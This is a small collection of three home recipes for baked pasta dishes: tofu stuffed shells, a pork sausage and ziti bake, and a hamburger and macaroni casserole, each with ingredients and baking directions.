Tofu Pasta Bake

INGREDIENTS:

1 box lg. shells
1 egg white
1/2 c. cottage cheese
1 (8 oz.) pkg. Mozzarella cheese, shredded
1 lb. tofu
Pinch of parsley
1 (32 oz.) jar spaghetti sauce

DIRECTIONS:

Mix tofu, egg white, cottage cheese, and parsley. Stuff shells with mixture. Spray 13 x 9 inch glass pan with Pam. Cover pan with 1/2 jar of sauce. Arrange shells in pan. Cover with remaining sauce and sprinkle with cheese. Bake at 350 degrees for 25-30 minutes. Pork And Pasta Bake

INGREDIENTS:

1/2 (16 oz.) pkg. ziti macaroni
1/2 (16 9z.) pkg. pork sausage
1 c. Ricotta or cottage cheese
1/2 (8 oz.) pkg. Mozzarella cheese, shredded
2 tbsp. grated Parmesan cheese
1/4 tsp. basil
1 (15 oz.) jar spaghetti sauce
1/4 c. chopped parsley

DIRECTIONS:

Cook macaroni as directed and drain. Preheat oven to 350 degrees. In saucepan cook pork sausage until browned; remove from heat and drain. Stir in Ricotta cheese, parsley, Parmesan and basil. Add 1/2 jar of sauce. Add ziti and mix well.

Spoon mixture into 8×8-inch dish. Pour on remaining sauce. Sprinkle with Mozzarella cheese. Bake 30 minutes or until cheese is melted. Baked Pasta

INGREDIENTS:

1 jar spaghetti sauce (or your own)
1 (8 oz.) pkg. elbow macaroni
1 lb. hamburger
4 oz. grated cheddar cheese
6 oz. sliced mozzarella cheese
Parmesan cheese

DIRECTIONS:

Cook macaroni according to directions, drain. Cook hamburger, drain and add spaghetti sauce. In casserole dish layer noodles, sauce and cheese saving mozzarella cheese for top. Sprinkle Parmesan cheese on very top.
